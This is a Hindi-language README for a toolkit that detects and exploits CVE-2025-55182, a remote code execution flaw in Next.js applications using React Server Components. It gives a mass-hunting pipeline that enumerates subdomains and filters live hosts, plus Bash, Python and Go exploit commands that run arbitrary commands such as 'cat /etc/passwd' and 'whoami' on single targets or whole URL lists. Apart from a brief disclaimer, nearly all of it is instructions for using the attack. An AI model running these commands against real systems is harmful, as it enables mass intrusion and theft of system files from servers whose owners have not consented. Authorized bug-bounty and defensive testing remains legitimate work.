
CVE-2025-55182 का पता लगाने और उसका शोषण करने के लिए एक व्यापक टूलकिट, जो React Server Components का उपयोग करने वाले Next.js अनुप्रयोगों में एक गंभीर रिमोट कोड एक्सेक्यूशन भेद्यता है।
इस रिपॉजिटरी में एक एकीकृत Bash स्कैनर (सिंगल और मास मोड), Python/Go कार्यान्वयन और एक बग बाउंटी रिकॉनिसेंस वर्कफ़्लो शामिल है।

वाइल्डकार्ड डोमेन पर मास हंटिंग के लिए, स्कैनिंग से पहले टारगेट को फ़िल्टर करने हेतु इस पाइपलाइन का उपयोग करें:
# 1. सबडोमेन खोजें
subfinder -dL wildcards.txt -all -recursive > subs.txt
# 2. लाइव होस्ट के लिए फ़िल्टर करें
httpx -l subs.txt -o live.txt
# 3. Nuclei का उपयोग करके प्री-स्कैन डिटेक्शन (वैकल्पिक)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt
scanner.sh स्क्रिप्ट सिंगल टारगेट स्कैन और फ़ाइल सूची से मास स्कैनिंग दोनों का समर्थन करती है।
chmod +x scanner.sh
वर्बोज़ आउटपुट के साथ किसी विशिष्ट टारगेट को सत्यापित करने के लिए सर्वोत्तम।
# बेसिक जाँच (डिफ़ॉल्ट "id")
./scanner.sh -d example.com
# कस्टम कमांड निष्पादित करें
./scanner.sh -d https://target.com -c "cat /etc/passwd"
URL की सूची को कुशलतापूर्वक स्कैन करता है और संवेदनशील होस्ट को फ़ाइल में सहेजता है।
# URL की सूची स्कैन करें
./scanner.sh -l live.txt -c "whoami"
# कस्टम आउटपुट फ़ाइल
./scanner.sh -l live.txt -o my_bounty.txt
यदि आपको Bash में विशेष वर्णों को एस्केप करने में समस्या आती है तो इसका उपयोग करें।
pip install requests
python3 python/exploit.py -u http://target.com -c "uname -a"
उच्च प्रदर्शन, न्यूनतम निर्भरताएँ।
go run go/main.go -u http://target.com -c "id"
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com
यह टूल केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है। अनधिकृत उपयोग सख्त रूप से अवैध है। डेवलपर इस प्रोग्राम के दुरुपयोग या इससे होने वाली क्षति के लिए कोई ज़िम्मेदारी नहीं लेता है।
NVD CVE विवरण: https://nvd.nist.gov/vuln/detail/CVE-2025-55182
React सुरक्षा सलाह (React Server Components भेद्यता): https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
ProjectDiscovery Nuclei टेम्पलेट: https://cloud.projectdiscovery.io/library/CVE-2025-55182
| फ़्लैग | विवरण |
|---|
-d, --domain | सिंगल टारगेट URL |
-l, --list | URL की सूची वाली फ़ाइल |
-c, --command | निष्पादित करने के लिए कमांड (डिफ़ॉल्ट: id) |
-o, --output | संवेदनशील होस्ट के लिए आउटपुट फ़ाइल (डिफ़ॉल्ट: vulnerable_hosts.txt) |